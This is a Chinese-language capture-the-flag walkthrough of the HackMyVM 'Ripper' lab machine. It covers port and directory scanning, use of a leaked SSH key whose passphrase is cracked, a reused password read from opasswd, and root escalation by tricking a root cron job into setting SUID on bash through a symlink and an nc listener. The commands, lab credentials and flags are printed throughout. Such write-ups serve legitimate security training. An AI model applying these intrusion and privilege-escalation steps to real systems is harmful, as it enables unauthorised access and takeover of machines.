[HMV] Ripper

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.90

---

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.90
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.90
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 0c3f13546e6ee656d291ebad9536c68d (RSA)
|   256 9be68e14397a17a38088cd772ec33b1a (ECDSA)
|_  256 855a052a4bc0b236ea8ae28ab2efbcdf (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:17:6A:06 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds

发现了 22(SSH) 和 80(HTTP) 端口。查看 Web 页面

Website in maintenance... Come back next month please.

网页和源码都没有任何提示。尝试扫描网站后台

┌──(root㉿Kali-VM)-[~]
└─# gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.16.1.90 -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.1.90
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 57]
/.html                (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
/staff_statements.txt (Status: 200) [Size: 107]
Progress: 878072 / 882244 (99.53%)
===============================================================
Finished
===============================================================

发现了一个可疑文件，staff_statements.txt。打开看看

The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files. 

提示我们技术员正在使用旧的 SSH 连接文件。最后在网站下找到了 id_rsa.bak

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo
cfZRVpSIfcOdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ

...

5fo7tGQ+DvUlyyLfk/UM4N8fsm+rsgkV84ogrTDn3CzMeBu6XY0+XWUbmhRL1/9yuWuU0D
By0QmXw3P/H1csxt8WRkuNygJz80o=
-----END OPENSSH PRIVATE KEY-----

得到了 SSH 私钥，尝试使用虚拟机登录页面的 "jack" 作为用户名登录

┌──(root㉿Kali-VM)-[~/work]
└─# ssh jack@172.16.1.90 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':

发现私钥文件有密码。使用 john 破解，得到密码 bananas。成功登录到 jack 用户

-bash-5.0$ pwd
/home/jack

-bash-5.0$ ls -al
total 32
drwx------ 4 jack jack 4096 May 23 02:18 .
drwxr-xr-x 4 root root 4096 May 26  2021 ..
lrwxrwxrwx 1 root root    9 May 26  2021 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 May 26  2021 .bash_logout
-rw-r--r-- 1 jack jack 3527 May 26  2021 .bashrc
drwxr-xr-x 3 jack jack 4096 May 26  2021 .local
-rw-r--r-- 1 jack jack  808 May 26  2021 .profile
drwx------ 2 jack jack 4096 May 26  2021 .ssh
-rw-r--r-- 1 jack jack  207 May 23 02:24 .wget-hsts

在 jack 用户的家目录下没有发现 user flag，看来需要继续提权

-bash-5.0$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
jack:x:1000:1000:,,,:/home/jack:/bin/bash
helder:x:1001:1001:,,,:/home/helder:/bin/bash

发现一个 helder 用户。但未找到 Sudo 或者 SUID 的提权方法。使用 linpeass.sh 脚本检查一下系统

═╣ Can I read opasswd file? ............. 
jack:Il0V3lipt0n1c3t3a

发现一个可疑的 opasswd。不过一开始我没注意到这个，而是用 pspy64 发现了一个计划任务

20XX/XX/XX XX:XX:XX CMD: UID=0     PID=13277  | /usr/sbin/CRON -f 
20XX/XX/XX XX:XX:XX CMD: UID=0     PID=13278  | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi 
20XX/XX/XX XX:XX:XX CMD: UID=0     PID=13279  | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 

这行命令是在做什么？

/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi 

• 创建 nc 监听在本地的 10000 端口上，每次只监听 1 秒
• 把 nc 监听到的输入重定向到 /root/.local/out
• 如果 /root/.local/helder.txt 和 /home/helder/passwd.txt 的内容一致，则对 nc 输入的东西赋予 SUID

多次尝试 nc 输入未果，猜测是上一个条件 /root/.local/helder.txt 和 /home/helder/passwd.txt 的内容不一致。不过闲杂还没有权限访问 /home/helder，更不要说 /root 了，所以这应该不是这步提权要用到的，应该是提权到 root 时用的

言归正传，尝试用刚才获得的密码 Il0V3lipt0n1c3t3a 登录 helder

-bash-5.0$ su - helder
Password: 

-bash-5.0$ id
uid=1001(helder) gid=1001(helder) groups=1001(helder)

-bash-5.0$ whoami
helder

-bash-5.0$ ls -al
total 36
drwx------ 3 helder helder 4096 May 23 02:48 .
drwxr-xr-x 4 root   root   4096 May 26  2021 ..
lrwxrwxrwx 1 root   root      9 May 26  2021 .bash_history -> /dev/null
-rw-r--r-- 1 helder helder  220 May 26  2021 .bash_logout
-rw-r--r-- 1 helder helder 3659 May 26  2021 .bashrc
drwxr-xr-x 3 helder helder 4096 May 26  2021 .local
lrwxrwxrwx 1 helder helder   23 May 23 02:46 passwd.txt -> /root/.local/helder.txt
-rw-r--r-- 1 helder helder  940 May 26  2021 .profile
-rw-r--r-- 1 helder helder    5 May 23 02:48 root
-rwx------ 1 helder helder   33 May 26  2021 user.txt
-rw------- 1 helder helder   52 May 26  2021 .Xauthority

-bash-5.0$ cat user.txt 
5c38d7d08c687355cb0ae3b6025cbe99

成功登录并获得了 user flag。接下来才是用到计划任务提权的地方。因为不知道 /root/.local/helder.txt 里到底是什么，所以我们直接创建一个软链接就行

-bash-5.0$ ln -s /root/.local/helder.txt /home/helder/passwd.txt

然后监听一下 10000 端口，并发送 "bash"，来给 bash 加上 SUID

-bash-5.0$ echo "bash" > ncmsg
-bash-5.0$ nc -lnvp 10000 < ncmsg

等待一会之后 nc 运行完毕，bash 也被赋予了 SUID

-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/bash
/usr/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

然后使用 bash -p 命令即可提权

-bash-5.0$ id
uid=1001(helder) gid=1001(helder) groups=1001(helder)

-bash-5.0$ bash -p

bash-5.0# id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

最后获得 root flag

bash-5.0# cat /root/root.txt
e28f578a17a5f99c0381c4b689d96f9f

---

0x02 总结

找 helder 的密码的时候走了一些弯路